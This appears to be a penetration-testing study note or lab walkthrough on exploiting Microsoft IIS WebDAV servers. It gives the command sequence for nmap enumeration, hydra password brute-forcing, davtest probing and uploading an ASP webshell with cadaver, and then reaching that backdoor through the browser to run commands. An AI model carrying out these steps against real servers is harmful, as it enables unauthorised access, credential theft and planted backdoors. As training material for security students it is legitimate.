IIS WebDav

Microsoft IIS (Internet Information Services) - a Microsoft proprietary extensible web server developed for use with Windows.

  • Ports: 80 (no certificate), 443 (with SSL Certificate)

  • Host websites and web applications

  • Administrative GUI for IIS management

  • Static and dynamic web pages, developed in ASP.NET and PHP

  • Supported file extensions: .asp, .aspx, .config, .php

🗒️ WebDAV (Web Distributed Authoring & Versioning) - a set of HTTP protocol extentions used by users to manage file on remote web servers.

  • Web server as File server

  • Runs on top of Apache or IIS - ports 80/443

  • Credentials, username & password, are necessary for connection the WebDAV server

WebDAV Exploitation

  1. Check if WebDAV is configured to run on the IIS web server.

  2. Brute-force attack on the WebDAV server - identify legitimate credentials.

  3. Use the obtained credentials to authenticate with the WebDAV and upload malicious code, like an .asp payload, used to execute arbitrary commands or obtain reverse shell on the target.

TOOLS:-

  1. davtest - scanner tool used to scan, authenticate and exploit a WebDAV server, by uploading test executable files which allow for command execution on the target. Pre-installed on Kali Linux and Parrot OS.

  2. cadaver - supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking. Pre-installed on Kali Linux and Parrot OS.

EXPLOITATION:-

nmap -p80 --script http-enum -sV 10.3.26.115

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-enum: 
|_  /webdav/: Potentially interesting folder (401 Unauthorized)
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

# 401 Unauthorized - authentication is enabled

#Hydra

  • Try hydra to brute force WebDAV in this case

hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt <ip address> http-get /webdav/

In this case there were no credentials that matched

#Davtest

Now we will try Davtest tool to see which extention and format of files the server support

NOTE:- Davtest tool requires legitamate credentials to authenticate with

davtest -auth username:password -url http://ip address/webdav

Cadaver

  • Use cadaver to upload an .asp payload to the /webdav directory

use cadaver to login by using the follwoing command

cadaver http://10.3.26.115/webdav
dav:/webdav/> ls
# commands can be used on the web server dav directory

Upload your payload in using the following command

dav:/webdav/> put /usr/share/webshells/asp/webshell.asp
  • Access the backdoor using the browser

    • http://10.3.26.115/webdav/webshell.asp

  • Windows commands can be provided in the box

Last updated